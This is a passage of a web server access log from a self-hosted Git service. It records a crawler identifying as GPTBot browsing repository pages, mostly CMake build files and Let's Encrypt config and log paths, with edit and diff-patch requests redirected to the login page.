"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:33:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:33:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:33:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:33:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:33:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12081] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12083] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11373] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11371] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10243] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11312] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11288] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11311] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11329] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11328] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11657] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16059] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10027] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10025] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10364] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10300] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10300] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10274] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10274] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10243] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 